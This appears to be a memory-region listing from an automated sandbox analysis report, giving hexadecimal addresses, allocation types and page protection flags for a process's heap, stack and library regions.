7FFAAC6D0000
|
trusted library allocation
|
page execute and read and write
|
||
21E683F1000
|
heap
|
page read and write
|
||
21E68A8C000
|
heap
|
page read and write
|
||
21666110000
|
heap
|
page read and write
|
||
21E68C02000
|
heap
|
page read and write
|
||
2A802250000
|
heap
|
page read and write
|
||
BB8ED79000
|
stack
|
page read and write
|
||
F8C16FF000
|
stack
|
page read and write
|
||
2EE2BFB0000
|
direct allocation
|
page read and write
|
||
23F4B094000
|
heap
|
page read and write
|
||
21E68B75000
|
heap
|
page read and write
|
||
236B1760000
|
heap
|
page execute and read and write
|
||
23F50590000
|
trusted library allocation
|
page read and write
|
||
21E6898A000
|
heap
|
page read and write
|
||
1A3B3ECA000
|
heap
|
page read and write
|
||
2EE2C09F000
|
direct allocation
|
page read and write
|
||
7FFAAC750000
|
trusted library allocation
|
page read and write
|
||
2EE2858F000
|
heap
|
page read and write
|
||
216660D6000
|
heap
|
page read and write
|
||
21E68B98000
|
heap
|
page read and write
|
||
236B4625000
|
trusted library allocation
|
page read and write
|
||
C000226000
|
direct allocation
|
page read and write
|
||
7FFAAC3F4000
|
trusted library allocation
|
page read and write
|
||
2B3BE0DF000
|
heap
|
page read and write
|
||
AD6BC7E000
|
unkown
|
page readonly
|
||
21E68C1B000
|
heap
|
page read and write
|
||
7FFAAC400000
|
trusted library allocation
|
page read and write
|
||
7FFAAC5AA000
|
trusted library allocation
|
page read and write
|
||
26078FE000
|
stack
|
page read and write
|
||
1DF01D4F000
|
heap
|
page read and write
|
||
21E68BF8000
|
heap
|
page read and write
|
||
21667B44000
|
heap
|
page read and write
|
||
C000154000
|
direct allocation
|
page read and write
|
||
AD6CB7E000
|
unkown
|
page readonly
|
||
21E67EB1000
|
heap
|
page read and write
|
||
21E68B2B000
|
heap
|
page read and write
|
||
21E68451000
|
heap
|
page read and write
|
||
AD6B779000
|
stack
|
page read and write
|
||
21E68424000
|
heap
|
page read and write
|
||
1DF01CE9000
|
heap
|
page read and write
|
||
20A54080000
|
heap
|
page read and write
|
||
21E68BF5000
|
heap
|
page read and write
|
||
C000513000
|
direct allocation
|
page read and write
|
||
21E68C0A000
|
heap
|
page read and write
|
||
2EE2C010000
|
direct allocation
|
page read and write
|
||
2EE2858C000
|
heap
|
page read and write
|
||
1DF13F87000
|
trusted library allocation
|
page read and write
|
||
2B3C1052000
|
trusted library allocation
|
page read and write
|
||
2B3CFBD3000
|
trusted library allocation
|
page read and write
|
||
AD6C17E000
|
unkown
|
page readonly
|
||
216661BA000
|
heap
|
page read and write
|
||
21E68AF8000
|
heap
|
page read and write
|
||
AD6C27B000
|
stack
|
page read and write
|
||
2B3D8037000
|
heap
|
page execute and read and write
|
||
1DF1D2C1000
|
unclassified section
|
page execute read
|
||
21E68B80000
|
heap
|
page read and write
|
||
21E68A1E000
|
heap
|
page read and write
|
||
2C388D60000
|
heap
|
page read and write
|
||
C000501000
|
direct allocation
|
page read and write
|
||
21666136000
|
heap
|
page read and write
|
||
21E68C0A000
|
heap
|
page read and write
|
||
1DF01C7F000
|
heap
|
page read and write
|
||
1DF01E50000
|
heap
|
page read and write
|
||
2B3BFA21000
|
trusted library allocation
|
page read and write
|
||
2EE2C040000
|
direct allocation
|
page read and write
|
||
AD6BF7E000
|
stack
|
page read and write
|
||
7FFAAC5D7000
|
trusted library allocation
|
page read and write
|
||
216661AD000
|
heap
|
page read and write
|
||
7FFAAC730000
|
trusted library allocation
|
page read and write
|
||
1A3B5840000
|
heap
|
page read and write
|
||
C000464000
|
direct allocation
|
page read and write
|
||
236B1AD9000
|
trusted library allocation
|
page read and write
|
||
2EE28583000
|
heap
|
page read and write
|
||
BB8E733000
|
stack
|
page read and write
|
||
23F50684000
|
heap
|
page read and write
|
||
236B2ED9000
|
trusted library allocation
|
page read and write
|
||
7FFAAC3FB000
|
trusted library allocation
|
page read and write
|
||
2B3C12B0000
|
trusted library allocation
|
page read and write
|
||
4114DCE000
|
stack
|
page read and write
|
||
236AFB6E000
|
heap
|
page read and write
|
||
21E68BF5000
|
heap
|
page read and write
|
||
7FFAAC680000
|
trusted library allocation
|
page read and write
|
||
7FFAAC5B0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC9B2000
|
trusted library allocation
|
page read and write
|
||
21E68C02000
|
heap
|
page read and write
|
||
21E68AAE000
|
heap
|
page read and write
|
||
21E68455000
|
heap
|
page read and write
|
||
21E68AF2000
|
heap
|
page read and write
|
||
21E68C02000
|
heap
|
page read and write
|
||
7FFB167B5000
|
unkown
|
page readonly
|
||
20A54020000
|
heap
|
page read and write
|
||
216661AF000
|
heap
|
page read and write
|
||
21E68A49000
|
heap
|
page read and write
|
||
BB8EEFE000
|
stack
|
page read and write
|
||
21E68BF8000
|
heap
|
page read and write
|
||
7FFAAC630000
|
trusted library allocation
|
page read and write
|
||
236B15A6000
|
heap
|
page read and write
|
||
20A66181000
|
trusted library allocation
|
page read and write
|
||
236B17A1000
|
trusted library allocation
|
page read and write
|
||
7FFB167A6000
|
unkown
|
page readonly
|
||
1DF036D0000
|
heap
|
page readonly
|
||
2608D4E000
|
stack
|
page read and write
|
||
1DF16269000
|
trusted library allocation
|
page read and write
|
||
7FFAAC590000
|
trusted library allocation
|
page read and write
|
||
21E68B30000
|
heap
|
page read and write
|
||
7FFAAC6B0000
|
trusted library allocation
|
page read and write
|
||
1DF1D703000
|
unclassified section
|
page readonly
|
||
21E68443000
|
heap
|
page read and write
|
||
2E7C7C10000
|
heap
|
page read and write
|
||
236B45F8000
|
trusted library allocation
|
page read and write
|
||
21E68972000
|
heap
|
page read and write
|
||
21E68C0A000
|
heap
|
page read and write
|
||
21E68C0A000
|
heap
|
page read and write
|
||
23F4B041000
|
heap
|
page read and write
|
||
7FFAAC6E0000
|
trusted library allocation
|
page read and write
|
||
7068E8A000
|
stack
|
page read and write
|
||
2EE2858C000
|
heap
|
page read and write
|
||
2E7C7AF0000
|
heap
|
page read and write
|
||
41142FF000
|
stack
|
page read and write
|
||
1DF1BDCB000
|
heap
|
page read and write
|
||
7FFAAC833000
|
trusted library allocation
|
page read and write
|
||
2B3C10C4000
|
trusted library allocation
|
page read and write
|
||
21E68C1B000
|
heap
|
page read and write
|
||
1DF01E76000
|
heap
|
page read and write
|
||
21E68C0A000
|
heap
|
page read and write
|
||
23F50702000
|
heap
|
page read and write
|
||
236B4584000
|
trusted library allocation
|
page read and write
|
||
AD6BBFE000
|
stack
|
page read and write
|
||
7FFAAC9B4000
|
trusted library allocation
|
page read and write
|
||
216661E3000
|
heap
|
page read and write
|
||
F7FA5F7000
|
stack
|
page read and write
|
||
41139CE000
|
stack
|
page read and write
|
||
21E68B61000
|
heap
|
page read and write
|
||
216660D4000
|
heap
|
page read and write
|
||
21E68C00000
|
heap
|
page read and write
|
||
21E68BF5000
|
heap
|
page read and write
|
||
C00018C000
|
direct allocation
|
page read and write
|
||
236AFB70000
|
heap
|
page read and write
|
||
236B4688000
|
trusted library allocation
|
page read and write
|
||
7FFAAC6A0000
|
trusted library allocation
|
page read and write
|
||
2C388B50000
|
heap
|
page read and write
|
||
236AFDE4000
|
heap
|
page read and write
|
||
21E6AC45000
|
heap
|
page read and write
|
||
AD6C37E000
|
unkown
|
page readonly
|
||
C000480000
|
direct allocation
|
page read and write
|
||
1DF03E22000
|
trusted library allocation
|
page read and write
|
||
AD6B47E000
|
unkown
|
page readonly
|
||
236B178C000
|
trusted library allocation
|
page read and write
|
||
20A56378000
|
trusted library allocation
|
page read and write
|
There are 1550 hidden memdumps, click here to show them.